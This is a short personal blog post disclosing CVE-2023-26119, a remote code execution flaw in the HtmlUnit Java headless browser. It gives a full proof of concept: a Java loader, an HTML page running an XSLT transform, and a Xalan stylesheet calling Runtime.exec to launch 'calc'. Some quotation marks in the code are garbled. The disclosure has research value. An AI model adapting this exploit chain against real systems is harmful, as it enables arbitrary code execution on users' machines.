Headline
CVE-2023-26119: HtmlUnit-RCE | Siebene@ Blog
Versions of the package net.sourceforge.htmlunit:htmlunit from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage.
HtmlUnit-RCE
2022-12-30 10:10:12 #WEB
「漏洞已經上報,最新版本已經修復 文章更新於23.1.26」
HtmlUnit 适用于java的无头浏览器,我其实觉得不算无头浏览器吧更像爬虫,最新版本也可以做到浏览攻击者网页触发RCE
先简单放个图,后面来补
其实真的蛮简单的就不分析了,我那天只是偶尔看了下就找到了,不过最近xslt好像比较火来着呢
Test.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package HtmlUnit;
import com.gargoylesoftware.htmlunit.WebClient;
import com.gargoylesoftware.htmlunit.html.HtmlPage;
public class Test {
public static void main(String\[\] args) throws Exception {
try (final WebClient webClient \= new WebClient()) {
final HtmlPage page \= webClient.getPage("http://xxx/htmlunit.html");
}
}
}
htmlunit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<script>
function createXmlDocument() {
return document.implementation.createDocument('’, '’, null);
}
function loadXMLDocumentFromFile(file) {
xhttp = new XMLHttpRequest();
xhttp.open("GET", file, false);
xhttp.send();
return xhttp.responseXML;
}
console.log(“1”);
var xmlDoc = createXmlDocument();
xmlDoc.async = false;
xmlDoc = loadXMLDocumentFromFile("1.xml");
var xslDoc = createXmlDocument();
xslDoc.async = false;
xslDoc = loadXMLDocumentFromFile("2.xml");
var processor = new XSLTProcessor();
processor.importStylesheet(xslDoc);
processor.transformToDocument(xmlDoc);
</script>
1.xml
1
2
<?xml version="1.0" encoding="UTF-8"?>
<s></s>
2.xml
1
2
3
4
5
6
7
8
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
<xsl:variable name="rtobject" select="rt:getRuntime()“/>
<xsl:variable name="process” select="rt:exec($rtobject,’calc’)“/>
<xsl:variable name="processString” select="ob:toString($process)"/>
<xsl:value-of select="$processString"/>
</xsl:template>
</xsl:stylesheet>
廢話收容所
我平常真的太懶了,平常如果不是要打CTF,基本上不自己主動學習,希望來年2023好好記錄博客督促自己
大三上學期基本上結束了,發現自己并沒有達到我所期望的水平,每天基本上就是什麽都沒幹就過去了,畢竟這一學期我大概是沒去學校上課,想著好好學習技術,結果高估自己了lmao
Related news
Vulnerability in the Oracle Hyperion Financial Reporting product of Oracle Hyperion (component: Repository). The supported version that is affected is 11.2.13.0.000. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hyperion Financial Reporting. While the vulnerability is in Oracle Hyperion Financial Reporting, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hyperion Financial Reporting accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hyperion Financial Reporting. CVSS 3.1 Base Score 8.5 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L).
Versions of the package `net.sourceforge.htmlunit:htmlunit` from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage.